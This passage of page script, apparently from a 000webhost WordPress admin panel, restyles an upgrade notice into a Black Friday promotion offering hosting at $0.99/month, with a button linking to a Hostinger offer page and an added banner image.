            var css = "@media only screen and (max-width: 576px) {#main_content {max-width: 320px !important;} #main_content h1 {font-size: 30px !important;} #main_content h2 {font-size: 40px !important; margin: 20px 0 !important;} #main_content p {font-size: 14px !important;} #main_content .content-wrapper {text-align: center !important;}} @media only screen and (max-width: 781px) {#main_content {margin: auto; justify-content: center; max-width: 445px;}} @media only screen and (max-width: 1325px) {.web-hosting-90-off-image-wrapper {position: absolute; max-width: 95% !important;} .notice_content {justify-content: center;} .web-hosting-90-off-image {opacity: 0.3;}} @media only screen and (min-width: 769px) {.notice_content {justify-content: space-between;} #main_content {margin-left: 5%; max-width: 445px;} .web-hosting-90-off-image-wrapper {position: absolute; display: flex; justify-content: center; width: 100%; }} .web-hosting-90-off-image {max-width: 90%;} .content-wrapper {min-height: 454px; display: flex; flex-direction: column; justify-content: center; z-index: 5} .notice_content {display: flex; align-items: center;} * {-webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;} .upgrade_button_red_sale{box-shadow: 0 2px 4px 0 rgba(255, 69, 70, 0.2); max-width: 350px; border: 0; border-radius: 3px; background-color: #ff4546 !important; padding: 15px 55px !important; font-family: 'Roboto', sans-serif; font-size: 16px; font-weight: 600; color: #ffffff;} .upgrade_button_red_sale:hover{color: #ffffff !important; background: #d10303 !important;}",
                style = document.createElement("style"),
                sheet = window.document.styleSheets[0];
            style.styleSheet ? style.styleSheet.cssText = css : style.appendChild(document.createTextNode(css)), document.getElementsByTagName("head")[0].appendChild(style), document.getElementsByTagName("head")[0].appendChild(googleFont);
            var button = document.getElementsByClassName("upgrade_button_red")[0],
                link = button.parentElement;
            link.setAttribute("href", "https://www.hostinger.com/hosting-starter-offer?utm_source=000webhost&amp;utm_medium=panel&amp;utm_campaign=000-wp"), link.innerHTML = '&lt;button class="upgrade_button_red_sale"&gt;Go for it&lt;/button&gt;', (notification = notification[0]).setAttribute("style", "padding-bottom: 0; padding-top: 5px; background-color: #040713; background-size: cover; background-repeat: no-repeat; color: #ffffff; border-left-color: #040713;"), notification.className = "notice notice-error is-dismissible";
            var mainContentHolder = document.getElementById("main_content");
            mainContentHolder.setAttribute("style", "padding: 0;"), hostingerLogo[0].remove();
            var h1Tag = notification.getElementsByTagName("H1")[0];
            h1Tag.className = "000-h1", h1Tag.innerHTML = "Black Friday Prices", h1Tag.setAttribute("style", 'color: white; font-family: "Roboto", sans-serif; font-size: 22px; font-weight: 700; text-transform: uppercase;');
            var h2Tag = document.createElement("H2");
            h2Tag.innerHTML = "Get 90% Off!", h2Tag.setAttribute("style", 'color: white; margin: 10px 0 15px 0; font-family: "Roboto", sans-serif; font-size: 60px; font-weight: 700; line-height: 1;'), h1Tag.parentNode.insertBefore(h2Tag, h1Tag.nextSibling);
            var paragraph = notification.getElementsByTagName("p")[0];
            paragraph.innerHTML = "Get Web Hosting for $0.99/month + SSL Certificate for FREE!", paragraph.setAttribute("style", 'font-family: "Roboto", sans-serif; font-size: 16px; font-weight: 700; margin-bottom: 15px;');
            var list = notification.getElementsByTagName("UL")[0];
            list.remove();
            var org_html = mainContent.innerHTML,
                new_html = '&lt;div class="content-wrapper"&gt;' + mainContent.innerHTML + '&lt;/div&gt;&lt;div class="web-hosting-90-off-image-wrapper"&gt;&lt;img class="web-hosting-90-off-image" src="https://cdn.000webhost.com/000webhost/promotions/bf-2020-wp-inject-img.png"&gt;&lt;/div&gt;';
            mainContent.innerHTML = new_html;
            var saleImage = mainContent.getElementsByClassName("web-hosting-90-off-image")[0]
        }
    </script>
</body>

</html>